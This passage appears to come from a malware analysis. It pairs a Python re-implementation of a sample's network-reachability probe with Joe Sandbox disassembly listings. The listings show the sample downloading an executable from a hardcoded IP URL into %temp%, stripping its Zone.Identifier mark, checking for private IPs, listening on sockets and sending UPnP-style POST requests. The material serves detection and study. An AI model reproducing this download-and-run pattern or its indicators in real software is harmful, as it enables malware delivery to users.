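PROBE_HOST = "www.update.microsoft.com"
PROBE_PORT = 80


def resolve(host: str) -> Optional[str]:
    """Mirror the subcall at 0040B3F0: inet_addr() first, gethostbyname() only
    when the string is not already a dotted quad.  None if resolution fails."""
    try:
        socket.inet_aton(host)
        return host
    except OSError:
        pass
    try:
        return socket.gethostbyname(host)
    except OSError:
        return None


def probe_local_address(host: str = PROBE_HOST, port: int = PROBE_PORT,
                        timeout: float = 5.0) -> Optional[str]:
    """socket() + connect() + getsockname(): a successful connect proves the host
    is reachable, and getsockname() then yields the address of the interface the
    OS routed through, i.e. this machine's outbound IP.  Nothing is sent on the
    connection.  Returns None when the connect fails (offline / refused)."""
    ip = resolve(host)
    if ip is None:
        return None
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        s.connect((ip, port))
        return s.getsockname()[0]
    except OSError:
        return None
    finally:
        s.close()


def demo_offline() -> Tuple[Optional[str], Optional[str]]:
    """Constructed offline stand-in: a loopback listener plays the Microsoft host,
    then is closed so the same probe sees a refused connect."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    port = listener.getsockname()[1]
    try:
        online = probe_local_address("127.0.0.1", port)
    finally:
        listener.close()
    offline = probe_local_address("127.0.0.1", port)
    return online, offline


if __name__ == "__main__":
    print(demo_offline())
```

On the wire this check is a DNS query for `www.update.microsoft.com` followed by a TCP handshake to port 80 with no HTTP request behind it, because the listing shows the sample needs only the connect to succeed; a legitimate Windows Update client issues HTTP traffic on that connection, so a bare handshake-and-close from an unexpected process is the observable to hunt for.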
                                                                                                                                    APIs
                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,0040DFDD,00000000), ref: 004013D5
                                                                                                                                    • socket.WS2_32(00000002,00000002,00000011), ref: 004013E4
                                                                                                                                    • bind.WS2_32(?,?,00000010), ref: 00401429
                                                                                                                                      • Part of subcall function 00401330: SetEvent.KERNEL32(?,00000000,?,0040154C,00000000), ref: 00401346
                                                                                                                                      • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(?,000000FF), ref: 00401352
                                                                                                                                      • Part of subcall function 00401330: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040135C
                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_00001100,00000000,00000000,00000000), ref: 00401459
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindsocket
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3943618503-0
                                                                                                                                    • Opcode ID: 553d10466bbec8e054a760f45873b700e7f933e75f0b3e1bb69a1e19c2fd66b5
                                                                                                                                    • Instruction ID: 36f5780ae761d5720ce2b15666c8ad773c7a5b56cb4710f169ddd2cda5c78557
                                                                                                                                    • Opcode Fuzzy Hash: 553d10466bbec8e054a760f45873b700e7f933e75f0b3e1bb69a1e19c2fd66b5
                                                                                                                                    • Instruction Fuzzy Hash: DE116674A417106BE3209F749C0AF877AE0AF04B54F50892DF659E72E1E3B49544879A
                                                                                                                                    APIs
                                                                                                                                    • CryptAcquireContextW.ADVAPI32(004083EF,00000000,00000000,00000001,F0000040,?,?,0040C889,004083EF,00000004,?,?,0040C8BE,000000FF), ref: 0040C843
                                                                                                                                    • CryptGenRandom.ADVAPI32(004083EF,?,00000000,?,?,0040C889,004083EF,00000004,?,?,0040C8BE,000000FF), ref: 0040C859
                                                                                                                                    • CryptReleaseContext.ADVAPI32(004083EF,00000000,?,?,0040C889,004083EF,00000004,?,?,0040C8BE,000000FF), ref: 0040C865
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1815803762-0
                                                                                                                                    • Opcode ID: a24c2434b3afb1955293fcca0a538135b7e24827869c87ceb3569772b55bea96
                                                                                                                                    • Instruction ID: f90ee11572ba5f49e3e1a660dc1e1657e7f5db47d76125bfba77a944767198f2
                                                                                                                                    • Opcode Fuzzy Hash: a24c2434b3afb1955293fcca0a538135b7e24827869c87ceb3569772b55bea96
                                                                                                                                    • Instruction Fuzzy Hash: 69E012B5650208FBDB14DFD1EC49FDA776CAB48B01F108554F709E7180DAB5EA4097A8
                                                                                                                                    APIs
                                                                                                                                    • NtQuerySystemTime.NTDLL(0040BD65), ref: 0040DF2A
                                                                                                                                    • RtlTimeToSecondsSince1980.NTDLL(0040BD65,?), ref: 0040DF38
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Time$QuerySecondsSince1980System
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1987401769-0
                                                                                                                                    • Opcode ID: 5c98a04c039906c0b732b0f639c8761212275eae2c79c402d7dd6553d16f435e
                                                                                                                                    • Instruction ID: 284f4c0ca90a751934941b1d9bfeddc82ee070f17a0c71d7a2ad06256d95dcf5
                                                                                                                                    • Opcode Fuzzy Hash: 5c98a04c039906c0b732b0f639c8761212275eae2c79c402d7dd6553d16f435e
                                                                                                                                    • Instruction Fuzzy Hash: 71D0C779D4010DBBCB00DBE4E84DCDDB77CEB44201F0086D6ED1593150EAB06658CBD5
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 0-3916222277
                                                                                                                                    • Opcode ID: 758c8ddec5ebc3f2fbc60252ee954f274e779d6146799bd0d90b894ddaeb8b1a
                                                                                                                                    • Instruction ID: 5fd1260cd0c1bb1f0d43ca887b35fd9fe7aa376b80e30ba4f5f1b1723d8df557
                                                                                                                                    • Opcode Fuzzy Hash: 758c8ddec5ebc3f2fbc60252ee954f274e779d6146799bd0d90b894ddaeb8b1a
                                                                                                                                    • Instruction Fuzzy Hash: 2C124FF5D00109ABCF14DF98D985AEFB7B5BB98304F10816DE609B7380D739AA41CBA5
                                                                                                                                    APIs
                                                                                                                                    • NtQueryVirtualMemory.NTDLL ref: 0040FBF6
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MemoryQueryVirtual
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2850889275-0
                                                                                                                                    • Opcode ID: 801e3abdb9ed3473d766d6bc3744bf4a8f04e52caf0f4b1d7f90672c87cc4716
                                                                                                                                    • Instruction ID: 340d7b290d5355f760e33cf283827fd55aa9a8eadb82a746881808a00d0f8de8
                                                                                                                                    • Opcode Fuzzy Hash: 801e3abdb9ed3473d766d6bc3744bf4a8f04e52caf0f4b1d7f90672c87cc4716
                                                                                                                                    • Instruction Fuzzy Hash: CD61D6316046098FDB39CB29D49166A73A5FF85754F25813BDC06E7AD0E338EC4ACA4C
                                                                                                                                    APIs
                                                                                                                                    • GetProcessHeaps.KERNEL32(000000FF,?), ref: 0040A8AC
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: HeapsProcess
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1420622215-0
                                                                                                                                    • Opcode ID: 1373c558315c2bb7b1b39264dd611deb399c5604e49ba0dd3c9b15e56f9cb6f7
                                                                                                                                    • Instruction ID: 4a2b5bc9ffc7c309cb72e1a35e8a8f61e1833fedd8d517872c2a42ed84d10103
                                                                                                                                    • Opcode Fuzzy Hash: 1373c558315c2bb7b1b39264dd611deb399c5604e49ba0dd3c9b15e56f9cb6f7
                                                                                                                                    • Instruction Fuzzy Hash: DD01DAF0904218CADB209B14D9887ADB774AB84304F1185EAD74977281C3781EDADF5E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 231c24adcade84eecc3356998d411f5491ca9746df8bd507928c4e2bbd5fa8a5
                                                                                                                                    • Instruction ID: 161e6bb5934f27057a9722b698e232d6f14762762655f0a3ce64c62cefac505d
                                                                                                                                    • Opcode Fuzzy Hash: 231c24adcade84eecc3356998d411f5491ca9746df8bd507928c4e2bbd5fa8a5
                                                                                                                                    • Instruction Fuzzy Hash: 0D127DB4D012199FCB48CF99D9919AEFBB2FF88304F24856AE415BB345D734AA01CF94
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 055ce3a16072e11c5b5b43c4deef216cb34a050bfe9534eea9d89275913ec06d
                                                                                                                                    • Instruction ID: 80201675dd9b1cda4480dbd7700016e3944d41601b7f9a5a171a0727e2a58fe8
                                                                                                                                    • Opcode Fuzzy Hash: 055ce3a16072e11c5b5b43c4deef216cb34a050bfe9534eea9d89275913ec06d
                                                                                                                                    • Instruction Fuzzy Hash: 3821D872900204ABCB24EF69C8819A7B7A5FF44350B05807AED559B285D734F919CBE0

Control-flow Graph

APIs
• GetTickCount.KERNEL32 ref: 0040F569
• srand.MSVCRT ref: 0040F570
• ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 0040F590
• strlen.NTDLL ref: 0040F59A
• mbstowcs.NTDLL ref: 0040F5B1
• rand.MSVCRT ref: 0040F5B9
• rand.MSVCRT ref: 0040F5CD
• wsprintfW.USER32 ref: 0040F5F4
• InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0040F60A
• InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040F639
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040F668
• InternetReadFile.WININET(00000000,?,00000103,?), ref: 0040F69B
• WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 0040F6CC
• CloseHandle.KERNEL32(000000FF), ref: 0040F6DB
• wsprintfW.USER32 ref: 0040F6F4
• DeleteFileW.KERNEL32(?), ref: 0040F704
• Sleep.KERNEL32(000003E8), ref: 0040F70F
• Sleep.KERNEL32(000007D0), ref: 0040F730
• ExitProcess.KERNEL32 ref: 0040F758
• DeleteFileW.KERNEL32(?), ref: 0040F76E
• CloseHandle.KERNEL32(000000FF), ref: 0040F77B
• InternetCloseHandle.WININET(00000000), ref: 0040F788
• InternetCloseHandle.WININET(00000000), ref: 0040F795
• Sleep.KERNEL32(000003E8), ref: 0040F7A0
• rand.MSVCRT ref: 0040F7B5
• Sleep.KERNEL32 ref: 0040F7C6
• rand.MSVCRT ref: 0040F7CC
• rand.MSVCRT ref: 0040F7E0
• wsprintfW.USER32 ref: 0040F807
• URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 0040F824
• wsprintfW.USER32 ref: 0040F844
• DeleteFileW.KERNEL32(?), ref: 0040F854
• Sleep.KERNEL32(000003E8), ref: 0040F85F
• Sleep.KERNEL32(000007D0), ref: 0040F880
• ExitProcess.KERNEL32 ref: 0040F8A7
• DeleteFileW.KERNEL32(?), ref: 0040F8B6
Strings
• Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36, xrefs: 0040F605
• %s\%d%d.exe, xrefs: 0040F5E8
• %s:Zone.Identifier, xrefs: 0040F6E8
• %s\%d%d.exe, xrefs: 0040F7FB
• %temp%, xrefs: 0040F58B
• %s:Zone.Identifier, xrefs: 0040F838
Memory Dump Source
• Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_33080.jbxd
Yara matches
Similarity
• API ID: File$Sleep$Internetrand$CloseDeleteHandlewsprintf$ExitOpenProcess$CountCreateDownloadEnvironmentExpandReadStringsTickWritembstowcssrandstrlen
• String ID: %s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
• API String ID: 1632876846-2803014298
• Opcode ID: 1320f0edb417db05ac7b6e59eda74473c88091b903de4ca17509dc3647de578b
• Instruction ID: 1975aeac9676e101a2f9df26b0893873e865047fe5e1fa68f0a59d9663d47833
• Opcode Fuzzy Hash: 1320f0edb417db05ac7b6e59eda74473c88091b903de4ca17509dc3647de578b
• Instruction Fuzzy Hash: EB81DBB1900314ABE720DB50DC45FE93379AF88701F0485B9F609A51D1DBBD9AC8CF69

Control-flow Graph

APIs
• GetTickCount.KERNEL32 ref: 004064A9
• srand.MSVCRT ref: 004064B0
• ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 004064D0
• rand.MSVCRT ref: 004064D6
• rand.MSVCRT ref: 004064EA
• wsprintfW.USER32 ref: 0040650F
• InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 00406525
• InternetOpenUrlW.WININET(00000000,http://185.215.113.66/tdrp.exe,00000000,00000000,00000000,00000000), ref: 00406552
• CreateFileW.KERNEL32(00415BA8,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040657F
• InternetReadFile.WININET(00000000,?,00000103,?), ref: 004065B2
• WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 004065E3
• CloseHandle.KERNEL32(000000FF), ref: 004065F2
• wsprintfW.USER32 ref: 00406609
• DeleteFileW.KERNEL32(?), ref: 00406619
• CloseHandle.KERNEL32(000000FF), ref: 0040662D
• InternetCloseHandle.WININET(00000000), ref: 0040663A
• InternetCloseHandle.WININET(00000000), ref: 00406647
Strings
• %temp%, xrefs: 004064CB
• Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36, xrefs: 00406520
• %s:Zone.Identifier, xrefs: 004065FD
• %s\%d%d.exe, xrefs: 00406505
• http://185.215.113.66/tdrp.exe, xrefs: 00406546
Memory Dump Source
• Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_33080.jbxd
Yara matches
Similarity
• API ID: Internet$CloseFileHandle$Openrandwsprintf$CountCreateDeleteEnvironmentExpandReadStringsTickWritesrand
• String ID: %s:Zone.Identifier$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36$http://185.215.113.66/tdrp.exe
• API String ID: 2816847299-853099633
• Opcode ID: b747dd0fc59dfde576c8c27ad5e268025f255cbc5a09298799a3dfcc346330de
• Instruction ID: 1fb007f132407df9fd1c0735e7405706d6c761cf3eec079010f6fac199ffc060
• Opcode Fuzzy Hash: b747dd0fc59dfde576c8c27ad5e268025f255cbc5a09298799a3dfcc346330de
• Instruction Fuzzy Hash: 524194B4A41318BBD7209B60DC4DFDA7774AB48701F1085E5F60AB61D1DABD6AC0CF28

Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0040B780: gethostname.WS2_32(?,00000100), ref: 0040B79C
                                                                                                                                      • Part of subcall function 0040B780: gethostbyname.WS2_32(?), ref: 0040B7AE
                                                                                                                                    • strcmp.NTDLL ref: 0040B880
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: gethostbynamegethostnamestrcmp
                                                                                                                                    • String ID: .10$.10.$.127$.127.$.192$.192.$0.0.0.0$10.$127.$192.
                                                                                                                                    • API String ID: 2906596889-2213908610
                                                                                                                                    • Opcode ID: d6ab6244daa99f352ff27f4ac61a156b87516d70ae34b11a0156eb07d3042b9e
                                                                                                                                    • Instruction ID: 8d4abfb17ef92fbeb3a58b36540fc168dced5822f8e8c36773a64fbd4adfcb3b
                                                                                                                                    • Opcode Fuzzy Hash: d6ab6244daa99f352ff27f4ac61a156b87516d70ae34b11a0156eb07d3042b9e
                                                                                                                                    • Instruction Fuzzy Hash: 826181B5A00205ABDB00AFA1FC46B9A3665EB50318F14847AE805B73C1EB7DE554CBDE

                                                                                                                                    Control-flow Graph
                                                                                                                                    APIs
                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040192C
                                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000001), ref: 0040193F
                                                                                                                                    • WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000000,00000000), ref: 00401959
                                                                                                                                    • WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 00401976
                                                                                                                                    • accept.WS2_32(?,?,?), ref: 004019A8
                                                                                                                                    • GetTickCount.KERNEL32 ref: 004019F6
                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00401A09
                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00401A2A
                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00401A3B
                                                                                                                                    • GetTickCount.KERNEL32 ref: 00401A43
                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00401A52
                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401A65
                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 00401AA5
                                                                                                                                    • GetTickCount.KERNEL32 ref: 00401AAB
                                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000001), ref: 00401ABB
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalSection$CountTick$LeaveWait$EnterEventsObjectSingle$EnumExchangeInterlockedMultipleNetworkaccept
                                                                                                                                    • String ID: PCOI$ilci
                                                                                                                                    • API String ID: 3345448188-3762367603
                                                                                                                                    • Opcode ID: d8b23688097d5b99dadb860a55cedc453d5f8d353fdf8d3fa83597af6fbeb7f2
                                                                                                                                    • Instruction ID: 80b39a6ab1993389b90647d5cb6895440bceaa9a0d1ea8ab9cba8154187b69d5
                                                                                                                                    • Opcode Fuzzy Hash: d8b23688097d5b99dadb860a55cedc453d5f8d353fdf8d3fa83597af6fbeb7f2
                                                                                                                                    • Instruction Fuzzy Hash: A7411771601201ABCB20DF74DC8CB9B77A9AF44720F04863DF855A72E1DB78E985CB99

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    • memset.NTDLL ref: 0040EF98
                                                                                                                                    • InternetCrackUrlA.WININET(00009E34,00000000,10000000,0000003C), ref: 0040EFE8
                                                                                                                                    • InternetOpenA.WININET(Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x),00000001,00000000,00000000,00000000), ref: 0040EFFB
                                                                                                                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040F034
                                                                                                                                    • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000000), ref: 0040F06A
                                                                                                                                    • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 0040F095
                                                                                                                                    • HttpSendRequestA.WININET(00000000,004126B0,000000FF,00009E34), ref: 0040F0BF
                                                                                                                                    • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040F0FE
                                                                                                                                    • memcpy.NTDLL(00000000,?,00000000), ref: 0040F150
                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040F181
                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040F18E
                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040F19B
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.1839743453.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.1839560572.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                    • Associated: 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                    • Associated: 00000001.00000002.1840037472.0000000000414000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_1_2_400000_33080.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Internet$CloseHandleHttpRequest$Open$ConnectCrackFileHeadersReadSendmemcpymemset
                                                                                                                                    • String ID: <$Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)$POST
                                                                                                                                    • API String ID: 2761394606-2217117414
                                                                                                                                    • Opcode ID: 48caadfad9c7ab3af6f27c5da5da9c09f3769a6c19190aa75f6955b0391b6548
                                                                                                                                    • Instruction ID: ef1808732392904e9289ee89b59ca4b2c464bfe5f798c53c6f33b23f739279b9
                                                                                                                                    • Opcode Fuzzy Hash: 48caadfad9c7ab3af6f27c5da5da9c09f3769a6c19190aa75f6955b0391b6548
                                                                                                                                    • Instruction Fuzzy Hash: 40510AB5A01228ABDB36CF54DC54BDA73BCAB48705F1081E9B50DAA280D7B96FC4CF54

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    • EnterCriticalSection.KERNEL32(?,00000000,?,?,004021A5,00000000), ref: 0040161F
                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 0040164B
                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401663
                                                                                                                                    • InterlockedIncrement.KERNEL32(?), ref: 00401691
                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 004016A1
                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,004021A5,00000000), ref: 004016B9
                                                                                                                                    • SetEvent.KERNEL32(?,?,?,004021A5,00000000), ref: 004016C3
                                                                                                                                    • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,?,004021A5,00000000), ref: 004016E0
                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 00401709
                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 0040170F
                                                                                                                                    • WSACloseEvent.WS2_32(?), ref: 00401715
                                                                                                                                    • DeleteCriticalSection.KERNEL32(?,?,?,?,004021A5,00000000), ref: 0040172B
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
